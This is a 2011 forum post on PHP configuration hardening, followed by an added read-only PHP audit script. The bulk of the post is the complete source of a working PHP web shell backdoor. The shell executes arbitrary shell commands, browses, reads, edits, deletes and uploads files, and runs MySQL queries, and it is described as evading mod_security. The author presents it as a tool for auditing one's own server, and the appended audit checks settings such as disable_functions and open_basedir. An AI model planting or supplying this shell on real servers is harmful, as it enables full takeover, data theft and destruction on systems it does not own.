How secure is your PHP configuration?

05-08-2011, 07:51 PM
#1
Village Genius
Status: Geek
Join date: Apr 2006
Location: Denver, CO
Expertise: Software
Software: Chrome, Notepad++
Posts: 6,894
iTrader: 18 / 100%

Properly securing your site has many aspects. One of these aspects is your PHP configuration. This is a last line of defense, not a first one. If for some reason a cracker has gotten a PHP script onto your server, how much damage can he do? The best way to do this is to use the script included at the bottom and see what you can do. Here are some aspects you should look into. The idea with all of these is minimum permissions; the PHP user should have no more abilities than it needs.

Upload abilities.
If your site does not upload files via a script, you should have it turned off. This removes the possibility that the cracker can use a backdoor to inject files on various parts of the server. While the ability to upload files is not an insecurity by itself, it can only be a weakness if there is no valid use for it.

File permissions.
If you don’t have any scripts that require the modification of files don’t allow it. Modifying files can allow a hacker to infect files that can linger even after he is gone.

Don't allow scripts where uploads are supposed to go.
If you run an upload site, no script should be allowed to run in the uploads directory. This means that even if someone can upload a PHP file, it will just be sent as plain text as opposed to actually being run. Doing this measure properly makes filetype checking irrelevant (although you may still want to do it).

Folder permissions.
The PHP user should have no access to directories that it doesn’t need to access. While anything above the webroot is fine, system files shouldn’t be part of it unless they are necessary.


See what a hacker could do with a script-based backdoor.
The script below is a backdoor PHP script that I wrote most of. It is completely standalone, can do a lot of neat things, and all its file abilities can bypass mod_security’s incoming data filters. To give a real list:
  • Traverse directories
  • Edit files
  • Delete files
  • Upload files
  • Directly download a file
  • View file contents as plain text
  • Execute mysql queries
  • Execute shell commands
  • Specifically designed to bypass mod_security in its file operations.

This is given solely for the purpose of auditing your own system; in no way do I condone using this tool against an unauthorized target. I've only tested this on Linux; it should work on Windows though. Make sure to follow the instructions on the page when uploading files:
PHP Code:
<?php

function cleanLinuxPath($path)
{
    // If it's a Windows path return what we had
    if($path[0] != "/")
        return $path;

    $parts = explode('/', $path);

    foreach($parts as $key => $val)
    {
        if($val == "..")
        {
            $parts[$key] = "";
            $lastKey = $key - 1;
            $parts[$lastKey] = "";
        }
        elseif($val == ".")
        {
            $parts[$key] = "";
        }
    }

    reset($parts);
    $fixedPath = "";
    foreach($parts as $val)
    {
        if($val != "")
        {
            $fixedPath .= '/' . $val;
        }
    }
    if($fixedPath == "")
    {
        $fixedPath = "/";
    }
    return $fixedPath;
}

if(isset($_REQUEST['dl'])){
    if(@fopen($_REQUEST['dl'], 'r') == true)
    {
        $_REQUEST['dl'] .= '/' . $_REQUEST['file'];
        if($_REQUEST['dl'][0] == '/') // If linux
            $fileArr = explode('/', $_REQUEST['dl']);
        else // If windows
            $fileArr = explode('\\', $_REQUEST['dl']);

        $fileName = $fileArr[sizeof($fileArr) - 1]; // Extract the file name from the path

        header('Content-disposition: attachment; filename=' . $fileName);
        header('Content-type: application/octet-stream');
        readfile($_REQUEST['dl']);
    }
    else
    {
        header('Content-disposition: attachment; filename=CANT_ACCESS_FILE');
        header('Content-type: application/octet-stream');
        echo "Could not access file on server";
    }
    die();
}

ob_implicit_flush();
if(isset($_REQUEST['f'])){
    $filename = $_REQUEST['f'];
    $file = fopen("$filename", "rb");
    header("Content-Type: text/plain");
    fpassthru($file);
    die;
}
if(isset($_REQUEST['d'])){
    $d = $_REQUEST['d'];
    echo "<pre>";
    if ($handle = opendir("$d")) {
        echo "<h2>listing of " . cleanLinuxPath($d) . " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanLinuxPath($d)) . "'>upload file</a>)</h2>";
        while ($dir = readdir($handle)){
            if (is_dir("$d/$dir"))
            {
                if($dir != "." && $dir != "..")
                    $dirList[] = $dir;
            }
            else
                $fileList[] = $dir;
        }

        echo "<a href='$PHP_SELF?d=$d/.'><font color=grey>.\n</font></a>";
        echo "<a href='$PHP_SELF?d=$d/..'><font color=grey>..\n</font></a>";

        if(is_array($dirList))
            foreach($dirList as $dir)
            {
                echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>$dir\n</font></a>";
            }
        if(is_array($fileList))
            foreach($fileList as $dir)
            {
                echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>$dir</font></a>"
                   . "|<a href='$PHP_SELF?dl=" . cleanLinuxPath($d . '&file=' . $dir) . "' target='_blank'>Download</a>|"
                   . "|<a href='$PHP_SELF?ef=" . cleanLinuxPath($d . '&file=' . $dir) . "' target='_blank'>Edit</a>|"
                   . "|<a href='$PHP_SELF?df=" . cleanLinuxPath($d . '&file=' . $dir) . "' target='_blank'>Delete</a>| \n";
            }
        closedir($handle);
    }
    else
        echo "opendir() failed";
    die("<hr>");
}
if(isset($_REQUEST['c'])){
    echo "<pre>";
    system($_REQUEST['c']);
    die;
}
if(isset($_REQUEST['uploadForm'])){
    if(isset($_FILES["file_name"]))
    {
        if ($_FILES["file_name"]["error"] > 0)
        {
            echo "Error";
        }
        else
        {
            $target_path = $_COOKIE["uploadDir"];
            if(substr($target_path, 0, 1) == "/" && substr($target_path, -1) != "/") // Linux path without a trailing slash
                $target_path .= "/";
            elseif(substr($target_path, 0, 1) != "/" && substr($target_path, -1) != "\\") // Windows path without a trailing backslash
                $target_path .= "\\";

            $target_path = $target_path . basename($_FILES['file_name']['name']);

            if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) {
                setcookie("uploadDir", "");
                echo "The file " . basename($_FILES['file_name']['name']) . " has been uploaded";
            }
        }
    }
    else
    {
?>
        <form target="_blank" action="<?php echo $PHP_SELF ?>" method="GET">
            <input type="hidden" name="cc" value="1" />
            Submit this form before submitting file (will open in new window):<br />
            Upload Directory: <input type="text" name="dir" value="<?= $_REQUEST["dir"] ?>"><br />
            <input type="submit" value="submit" />
        </form>
        <br /><br />

        <form enctype="multipart/form-data" action="<?php echo $PHP_SELF ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
        Upload file:<input name="file_name" type="file"> <input type="submit" value="Upload" /></form>
<?php
    }
    die();
}
if(isset($_REQUEST['cc'])){
    setcookie("uploadDir", $_GET["dir"]);
    echo "You are OK to upload the file, dont upload any others in between this.";
    die();
}
if(isset($_REQUEST['mquery'])){
    $host = $_REQUEST['host'];
    $usr = $_REQUEST['usr'];
    $passwd = $_REQUEST['passwd'];
    $db = $_REQUEST['db'];
    $mquery = $_REQUEST['mquery'];

    mysql_connect("$host", "$usr", "$passwd") or
        die("Could not connect: " . mysql_error());
    mysql_select_db("$db");
    $result = mysql_query("$mquery");
    if($result != FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
    while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) print_r($row);
    mysql_free_result($result);
    die;
}
if(isset($_REQUEST['df'])){
    $_REQUEST['df'] .= '/' . $_REQUEST['file'];
    if(@unlink($_REQUEST['df']))
    {
        echo "File deleted";
    }
    else
    {
        echo "Error deleting file";
    }
    die();
}
if(isset($_REQUEST['ef'])){
?>
<script type="text/javascript">
  <!--

  var keyStr = "ABCDEFGHIJKLMNOP" +
               "QRSTUVWXYZabcdef" +
               "ghijklmnopqrstuv" +
               "wxyz0123456789+/" +
               "=";

  function encode64(input) {
     input = escape(input);
     var output = "";
     var chr1, chr2, chr3 = "";
     var enc1, enc2, enc3, enc4 = "";
     var i = 0;

     do {
        chr1 = input.charCodeAt(i++);
        chr2 = input.charCodeAt(i++);
        chr3 = input.charCodeAt(i++);

        enc1 = chr1 >> 2;
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
        enc4 = chr3 & 63;

        if (isNaN(chr2)) {
           enc3 = enc4 = 64;
        } else if (isNaN(chr3)) {
           enc4 = 64;
        }

        output = output +
           keyStr.charAt(enc1) +
           keyStr.charAt(enc2) +
           keyStr.charAt(enc3) +
           keyStr.charAt(enc4);
        chr1 = chr2 = chr3 = "";
        enc1 = enc2 = enc3 = enc4 = "";
     } while (i < input.length);

     return output;
  }

  //--></script>

<?php
    $_REQUEST['ef'] .= '/' . $_REQUEST['file'];
    if(isset($_POST["newcontent"]))
    {
        $_POST["newcontent"] = urldecode(base64_decode($_POST["newcontent"]));
        $stream = @fopen($_REQUEST['ef'], "w");

        if($stream)
        {
            fwrite($stream, $_POST["newcontent"]);
            echo "Write successful";
            fclose($stream);
        }
        else
        {
            echo "Could not write to file";
        }
    }
?>
    <form action="" name="f" method="POST">
    <textarea wrap="off" rows="40" cols="130" name="newcontent"><?= file_get_contents($_REQUEST['ef']) ?></textarea><br />
    <input type="submit" value="I base64 encoded it myself, dont run script" /><br />
    <input type="submit" value="Change (requires javascript to work)" onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />
    </form>
<?php
    die();
}

?>

<pre><form action="<?php echo $PHP_SELF ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
to browse go to ?d=[directory here]
<br>for example:
?d=/etc on *nix
c:/windows on win

Go to <a href="?d=<?= getcwd() ?>">current working directory</a>
Go to <a href="?d=/">root directory (linux only)</a>

<hr>execute mysql query:
<form action="<?php echo $PHP_SELF ?>" METHOD=GET >
host:<input type="text" name="host" value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">

database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>
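As an added example, not part of Village Genius's post or the script above: a read-only audit that reports on the four configuration aspects the post lists (upload abilities, file permissions, scripts in the upload directory, folder permissions) plus whether the shell-command functions the backdoor relies on are disabled. It changes nothing on the server. The document root and the uploads directory are assumptions taken from DOCUMENT_ROOT and a hypothetical uploads/ folder below it; adjust them to your layout. The .htaccess check only applies where PHP runs as an Apache module that honours php_flag; under PHP-FPM the equivalent is a location rule in the web server config that refuses to hand .php files from the uploads directory to PHP.

```php
<?php
// Added example, not part of the original post: a read-only audit of the
// settings the post lists. It changes nothing; run it once from the CLI
// (php audit.php) or briefly from the webroot, then delete it.

// Collect up to $limit paths under $root that the PHP user can write to.
function writable_paths(string $root, int $limit = 200): array
{
    $found = [];
    if (!is_dir($root)) {
        return $found;
    }
    try {
        $it = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
            RecursiveIteratorIterator::SELF_FIRST
        );
        foreach ($it as $path => $info) {
            if (is_writable($path)) {
                $found[] = $path;
                if (count($found) >= $limit) {
                    break;
                }
            }
        }
    } catch (UnexpectedValueException $e) {
        // An unreadable subtree ends the walk early instead of aborting the audit.
    }
    return $found;
}

// One finding per aspect: current value, whether it is acceptable, and the fix.
function audit_php_config(string $docroot, string $uploadDir): array
{
    $f = [];

    // Upload abilities: if no script accepts uploads, turn the feature off.
    $uploads = filter_var(ini_get('file_uploads'), FILTER_VALIDATE_BOOLEAN);
    $f['file_uploads'] = [
        'value'  => $uploads ? 'On' : 'Off',
        'ok'     => !$uploads,
        'advice' => 'file_uploads = Off in php.ini unless a script needs uploads',
    ];

    // Shell commands: the backdoor in the post relies on system();
    // disable_functions removes these from the interpreter for every script.
    $shell    = ['system', 'exec', 'shell_exec', 'passthru', 'popen', 'proc_open'];
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $exposed  = array_values(array_diff($shell, $disabled));
    $f['disable_functions'] = [
        'value'  => $exposed ? 'callable: ' . implode(', ', $exposed) : 'all listed functions disabled',
        'ok'     => $exposed === [],
        'advice' => 'disable_functions = ' . implode(',', $shell),
    ];

    // Folder permissions: open_basedir confines file functions to the listed trees.
    $basedir = (string) ini_get('open_basedir');
    $f['open_basedir'] = [
        'value'  => $basedir === '' ? 'not set (whole filesystem reachable)' : $basedir,
        'ok'     => $basedir !== '',
        'advice' => 'open_basedir = ' . rtrim($docroot, '/') . '/:/tmp/',
    ];

    // File permissions: code the PHP user can write to is code it can infect.
    $writable = writable_paths($docroot);
    $f['writable_in_docroot'] = [
        'value'  => count($writable) . ' writable entries' . ($writable ? ', e.g. ' . $writable[0] : ''),
        'ok'     => $writable === [],
        'advice' => 'own the code tree as a deploy user; give the PHP user read-only access',
    ];

    // Scripts in the upload directory: under mod_php a per-directory
    // "php_flag engine off" turns uploaded .php files into plain downloads.
    $htaccess  = rtrim($uploadDir, '/') . '/.htaccess';
    $engineOff = is_file($htaccess)
        && preg_match('/^\s*php_(admin_)?flag\s+engine\s+off/im', (string) file_get_contents($htaccess)) === 1;
    $f['upload_dir_no_php'] = [
        'value'  => !is_dir($uploadDir) ? 'directory missing' : ($engineOff ? 'engine off in ' . $htaccess : 'no engine-off directive found'),
        'ok'     => !is_dir($uploadDir) || $engineOff,
        'advice' => 'php_flag engine off in ' . $htaccess . ' (mod_php); under PHP-FPM deny .php in that location in the web server config',
    ];

    return $f;
}

// Assumed paths: the vhost document root and a hypothetical uploads/ folder below it.
$docroot   = !empty($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd();
$uploadDir = rtrim($docroot, '/') . '/uploads';

if (PHP_SAPI !== 'cli') {
    header('Content-Type: text/plain');
}
foreach (audit_php_config($docroot, $uploadDir) as $name => $r) {
    printf("%-4s %-20s %s\n     fix: %s\n", $r['ok'] ? 'OK' : 'WEAK', $name, $r['value'], $r['advice']);
}
```

Each WEAK line maps to one of the post's points: a writable code tree is the "file permissions" problem, a missing open_basedir is the "folder permissions" problem, and an uploads directory without an engine-off rule is the "scripts where uploads go" problem. The disable_functions entry is the direct counterpart to the backdoor's `?c=` command runner: with system() and its siblings removed from the interpreter, that part of the script fails on the first call.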